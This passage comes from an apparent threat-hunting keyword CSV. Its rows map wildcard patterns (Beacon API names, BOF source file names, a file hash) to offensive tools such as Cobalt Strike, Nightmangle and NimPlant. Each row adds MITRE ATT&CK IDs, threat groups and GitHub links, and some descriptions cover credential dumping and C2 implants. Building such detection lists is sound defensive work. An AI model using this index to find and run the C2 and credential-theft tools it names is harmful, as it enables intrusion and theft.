Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" +"*BeaconInjectProcess*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*BeaconInjectProcess*","offensive_tool_keyword","Nightmangle","ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","0","N/A","10","10","73","10","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z" +"*BeaconInjectProcess*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*BeaconInjectTemporaryProcess*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" +"*BeaconInjectTemporaryProcess*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*BeaconInjectTemporaryProcess*","offensive_tool_keyword","Nightmangle","ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","0","N/A","10","10","73","10","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z" +"*BeaconJob.cs*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"*BeaconJobWriter.cs*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"*beaconlogs.json*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*beaconlogtracker.py*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*BeaconNote.cna*","offensive_tool_keyword","cobaltstrike","Cobaltstrike toolkit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/1135/1135-CobaltStrike-ToolKit","1","1","N/A","10","10","149","40","2021-03-29T07:00:00Z","2019-02-22T09:36:44Z" +"*BeaconNotify.cna*","offensive_tool_keyword","cobaltstrike","Cobaltstrike toolkit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/1135/1135-CobaltStrike-ToolKit","1","1","N/A","10","10","149","40","2021-03-29T07:00:00Z","2019-02-22T09:36:44Z" +"*BeaconObject.cs*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"*BeaconOutputStreamW*","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/WdToggle","1","1","N/A","10","10","217","32","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z" +"*BeaconOutputWriter.cs*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"*BeaconPrintf(*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF for quser.exe implementation using Windows API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/Quser-BOF","1","1","N/A","10","10","78","10","2023-03-22T17:07:02Z","2021-04-01T15:19:50Z" +"*BeaconPrintf*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to identify processes with the CLR loaded with a goal of identifying SpawnTo / injection candidates.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://gist.github.com/G0ldenGunSec/8ca0e853dd5637af2881697f8de6aecc","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*BeaconPrintToStreamW*","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/WdToggle","1","1","N/A","10","10","217","32","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z" +"*BeaconSpawnTemporaryProcess*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" +"*BeaconSpawnTemporaryProcess*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*BeaconTool -*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","0","N/A","10","10","1038","225","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" +"*BeaconTool/lib/sleep.jar*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1038","225","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" +"*BeaconUseToken*","offensive_tool_keyword","cobaltstrike","Dumping SAM / SECURITY / SYSTEM registry hives with a Beacon Object File","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/BOF-RegSave","1","1","N/A","10","10","171","29","2020-10-08T17:29:02Z","2020-10-07T13:46:03Z" +"*beb285e40caf95bcc1552fc293194fa29275e3cdb9c62ef752b62257f6480aaf*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense 